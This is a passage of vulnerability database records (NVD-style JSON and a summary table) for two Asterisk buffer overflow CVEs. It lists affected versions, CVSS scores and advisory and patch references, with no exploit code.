              "matchCriteriaId": "9FAEBE5E-378A-40DC-B2B9-31F6D1305BCE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.2.3:-:business:*:*:*:*:*",
              "matchCriteriaId": "617B3FE8-39E3-41C0-9348-9507DA43DE93",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.3.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "04AB4C82-71BB-49B7-B4F3-4E75EFB5F1A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.6.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "78B55176-E269-411B-974A-B5D2CE8E08C2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisknow:1.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "FF81215F-0DD3-48FC-BA1C-19E42FCD47B5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:h:digium:s800i:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "E063F5CE-AAF1-4FB0-9D75-E26F30B85409",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B8FE4BCF-9AE7-4F41-BA84-E9537CC1EBE3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F25B0D15-7C09-4BBB-AC84-A1898F448DB7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "F259057F-3720-45D8-91B4-70A11B759794",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "A106C460-4CE2-4AC3-B2FD-310F05507511",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "3E119FF9-2AD3-450D-8BBF-C6DD063246EA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "759221D5-FC37-446D-9628-233B8D0B9120",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "F82D4812-0429-42D4-BD27-C76CB9E7C368",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.3:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8FE11D6-8C0A-450E-B6DA-3AFE04D82232",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D1FBCC8-4637-4A67-BFFD-C052C3C03C12",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "F7307E10-9FA5-4940-B837-7936384F61DD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.5:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3D0DC9D6-D4D6-46CB-98DA-F4FC1835B6B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "DBBD0747-F3FF-46D8-A3C4-8268E37BC5AE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.7:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3F759F27-008E-47FB-AC0A-EF11DA19918E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.7:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D15C82BA-BD1F-4A19-A907-E6C30042F537",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E802481-C8BD-4218-8CDC-5DB112DA946C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "D6FC8A53-E3C0-4660-BE75-2B5B8B4F8160",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "93C020CD-D0EA-4B3E-B33C-F900B08B28FE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0004AADE-1652-4242-A97D-E9818FE03CCF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "543E9C91-60FE-43AE-9B94-08DD730BA814",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.10:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "252849FA-F46E-4F5A-A488-AA53574CA884",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "9EB89B4F-9546-4DF0-B69F-1B9F289BB1E6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "2E254415-1D59-4A77-80FB-AE3EF10FBB32",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.12:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DF2407D0-C324-45C4-9FBB-4294F747DBDC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "F23A36CC-9AA2-4559-946D-6D0621664342",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.13:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "89C40652-E180-416A-B88A-E6313530E98A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "A28C2C5D-A573-4036-A600-BE28A3E417B9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.15:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "EE162390-359F-4C5D-902B-275FB1FC3EF2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.16:*:*:*:*:*:*:*",
              "matchCriteriaId": "4A0A3750-0D34-4FB5-B897-17CA0D0B7CE7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.17:*:*:*:*:*:*:*",
              "matchCriteriaId": "D11BE58D-5B7E-4BB5-988A-7FC2E4B92C4F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.18:*:*:*:*:*:*:*",
              "matchCriteriaId": "22631AE6-5DA1-46C6-A239-C232DA0D0E7B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.18:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9F5CB8CC-4CC1-4A1B-8AD1-C876D1BC80EE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.18:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "8591DB43-EAA0-4D58-BA23-EAD916DEA3DF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.19:*:*:*:*:*:*:*",
              "matchCriteriaId": "4E4747F8-1AFC-4AEF-82D8-D6604FB5222E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.19:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "B82172C9-EA5B-4FC9-A445-0A297AE56FF2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.19:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "0C71CDAB-A299-4F1D-942D-851C899E63BC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.19:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "E2FA9AB9-4C83-45A3-9772-3A16030DBF1C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.20:*:*:*:*:*:*:*",
              "matchCriteriaId": "A88C639A-9229-4D99-9087-1B0B95539BD9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.20:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0B7DE987-7351-495A-8776-37E6B7BF0C0F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.20:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "CB5823CC-941F-47AB-AD1F-325181D40E60",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.6.1.21:*:*:*:*:*:*:*",
              "matchCriteriaId": "712AF374-846D-4F21-91C4-1BA9AB33E46D",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple stack-based and heap-based buffer overflows in the (1) decode_open_type and (2) udptl_rx_packet functions in main/udptl.c in Asterisk Open Source 1.4.x before 1.4.39.2, 1.6.1.x before 1.6.1.22, 1.6.2.x before 1.6.2.16.2, and 1.8 before 1.8.2.4; Business Edition C.x.x before C.3.6.3; AsteriskNOW 1.5; and s800i (Asterisk Appliance), when T.38 support is enabled, allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted UDPTL packet."
    },
    {
      "lang": "es",
      "value": "M\u00faltiples desbordamientos de b\u00fafer en las funciones (1) decode_open_type y (2) udptl_rx_packet en main/udptl.c en Asterisk Open Source v1.4.x anterior a v1.4.39.2, v1.6.1.x antes de v1.6.1.22, v1.6.2.x antes de v1.6.2.16.2, y v1.8 antes de v1.8.2.4; Business Edition vC.x.x antes de vC.3.6.3; AsteriskNOW v1.5; y s800i (Asterisk Appliance), cuando el soporte T.38 est\u00e1 activo, permite a atacantes remotos provocar una denegaci\u00f3n de servicio (ca\u00edda) y posiblemente ejecutar c\u00f3digo de su elecci\u00f3n a trav\u00e9s de un paquete UDPTL manipulado"
    }
  ],
  "id": "CVE-2011-1147",
  "lastModified": "2024-11-21T01:25:39.780",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.8,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2011-03-15T17:55:05.953",
  "references": [
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-002.html"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Patch"
      ],
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055030.html"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Patch"
      ],
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055421.html"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Patch"
      ],
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055634.html"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/43429"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/43702"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://www.debian.org/security/2011/dsa-2225"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://www.openwall.com/lists/oss-security/2011/03/11/2"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://www.openwall.com/lists/oss-security/2011/03/11/8"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://www.securityfocus.com/bid/46474"
    },
    {
      "source": "secalert@redhat.com",
      "url": "http://www.securitytracker.com/id?1025101"
    },
    {
      "source": "secalert@redhat.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2011/0635"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-002.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055030.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055421.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-March/055634.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/43429"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/43702"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2011/dsa-2225"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.openwall.com/lists/oss-security/2011/03/11/2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.openwall.com/lists/oss-security/2011/03/11/8"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/46474"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securitytracker.com/id?1025101"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.vupen.com/english/advisories/2011/0635"
    }
  ],
  "sourceIdentifier": "secalert@redhat.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-119"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2017-04-10 14:59

Modified

2024-11-21 03:32

Severity ?

8.8 (High) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

Remote code execution can occur in Asterisk Open Source 13.x before 13.14.1 and 14.x before 14.3.1 and Certified Asterisk 13.13 before 13.13-cert3 because of a buffer overflow in a CDR user field, related to X-ClientCode in chan_sip, the CDR dialplan function, and the AMI Monitor action.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2017-001.html	Patch, Vendor Advisory
cve@mitre.org	http://www.securityfocus.com/bid/97377	Third Party Advisory, VDB Entry
cve@mitre.org	https://bugs.debian.org/859910	Patch, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2017-001.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/97377	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://bugs.debian.org/859910	Patch, Third Party Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	13.0.0
digium	asterisk	13.0.0
digium	asterisk	13.0.0
digium	asterisk	13.0.0
digium	asterisk	13.0.1
digium	asterisk	13.0.2
digium	asterisk	13.1.0
digium	asterisk	13.1.0
digium	asterisk	13.1.0
digium	asterisk	13.1.1
digium	asterisk	13.2.0
digium	asterisk	13.2.0
digium	asterisk	13.2.1
digium	asterisk	13.3.0
digium	asterisk	13.3.2
digium	asterisk	13.4.0
digium	asterisk	13.4.0
digium	asterisk	13.5.0
digium	asterisk	13.5.0
digium	asterisk	13.6.0
digium	asterisk	13.7.0
digium	asterisk	13.7.0
digium	asterisk	13.7.1
digium	asterisk	13.7.2
digium	asterisk	13.8.0
digium	asterisk	13.8.0
digium	asterisk	13.8.1
digium	asterisk	13.8.2
digium	asterisk	13.9.0
digium	asterisk	13.9.1
digium	asterisk	13.10.0
digium	asterisk	13.10.0
digium	asterisk	13.11.0
digium	asterisk	13.11.1
digium	asterisk	13.11.2
digium	asterisk	13.12
digium	asterisk	13.12.0
digium	asterisk	13.12.1
digium	asterisk	13.12.2
digium	asterisk	13.13
digium	asterisk	13.13.0
digium	asterisk	13.14.0
digium	asterisk	14.0
digium	asterisk	14.0.0
digium	asterisk	14.0.0
digium	asterisk	14.0.0
digium	asterisk	14.0.0
digium	asterisk	14.0.0
digium	asterisk	14.0.1
digium	asterisk	14.0.2
digium	asterisk	14.1
digium	asterisk	14.01
digium	asterisk	14.1.0
digium	asterisk	14.1.1
digium	asterisk	14.1.2
digium	asterisk	14.02
digium	asterisk	14.2
digium	asterisk	14.2.0
digium	asterisk	14.2.1
digium	asterisk	14.3.0
digium	certified_asterisk	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "E7D1238A-A8D2-485E-81FD-46038A883EC3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "E93A7967-9A04-424A-BDDB-A2B8289B9AC4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "8F75C9FF-6F95-4F6A-B683-FE2BEDE3AD10",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "68226156-42ED-4F0E-93E1-02DD57E582B6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "FB2C4E1E-6B90-4DCC-BC09-7D19FBA65C3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "A4EB385E-28B5-4259-9431-99E1F32D61B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "58C0FF1B-6188-4181-A139-1806328762BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "890EBB8C-989B-4344-AC03-62B399076008",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BD4AAECB-A2BC-45BA-BC63-E51C1FE6C334",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "121EACD3-D5E3-4691-8024-95996865BB65",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "136D6508-660E-410D-829A-7DD452BF8819",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "AEC2B3AA-EB24-4259-BED1-5DBC102FE9C1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "74B23D17-7356-4D37-8C73-E87896D1335B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CEA9DA4A-A3E6-4C46-9471-CCBFA71083AF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "81A8A6CB-D236-4AB3-8476-C2D34DB7EF31",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "599833A2-CBE9-479B-8A6E-AF79C5EED1DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "B55719B3-7325-47E1-8D16-3F34B1F44385",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B870B3B7-E8DC-45A2-8FA4-657D005D00E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C91E9A3B-54EB-4819-94DD-30F7D0C90047",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "47189DF9-8E57-4BA6-9F52-B7A8229AE02A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "84AAFA3C-3CCD-4615-9725-169C303CF18F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C92E0801-9E8F-4CF2-A4A0-48BCF550F2D4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5C1C39FA-EF1A-4F2B-87A0-A00BAE73C6A7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "677D1211-0B07-47B9-AB7A-E820E2B29561",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "84202BAF-29E1-472B-B11F-B73F6A8891CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FFC7120D-E6A0-4801-A1CC-3E143896EE72",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "BAF2A83D-D9AE-441D-8D4E-335BF9D28A63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7F5C1479-A540-4B7D-B00C-BD35EEC83BB4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC12556C-5E82-47D7-87E5-FBDC01A920DD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.9.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "461C1D2D-C4C1-4FF8-8231-38A2505F3523",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "66595711-8573-4A9B-A8FE-4943E3097AA8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5D1FE3D4-A0B9-475A-9B89-B0222283A6A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "9670B5AC-CBD1-484C-90F8-69B1A60B6054",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.11.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EE5794B6-246C-415E-8E20-56447F152488",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.11.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "E726CA39-A763-4422-B59E-E9E12518EA4D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "6A96EB57-835A-45B4-82F5-31F925A85629",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.12.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "206F1DC9-9E8F-4497-A354-4A14711993DC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "8D428364-E2AD-4BC6-9329-71793BC0EB61",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.12.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "08963910-E0BD-4487-B669-60E0BFA79863",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "86B16D04-3808-4380-8F64-0C36B185C1F2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F3BD16A9-24BC-4FC1-81BA-A6D1FEF38D35",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.14.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "CDC383B3-27EF-4C37-94BE-F0D41B34CAFC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C949D5F5-6C0B-4B17-85B6-3A77D08CF967",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D413741-BDB7-496D-A01B-75E2A98FDB5B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "29130F7F-DE00-43E1-A4A6-8F1F95D5CB19",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "25E94EC0-F577-4B2B-8B11-DC76278CDD42",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "101AD474-9B89-483D-84E8-08012677C55C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D57E41F6-C2CF-4183-A78A-9531A88FB65D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "FB1F9BB8-F951-427E-B770-69C2ACEBDB28",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7C4CE405-E923-4C9C-849A-D1031C4DB493",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C039C0CE-9C9C-4D85-8D7C-574DCF9D920B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.01:*:*:*:*:*:*:*",
              "matchCriteriaId": "A1B2F2CC-18C3-46E7-8E7F-970622A710C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "04ECDFF1-9718-4FAE-B45B-4F8CCA82829E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "D2C4DA60-5701-4BD0-B2F9-D93B9E64111F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "0B12834D-2AF1-4AD1-AB23-859CAA5D3210",
              "vulnerable": true
            },
            {
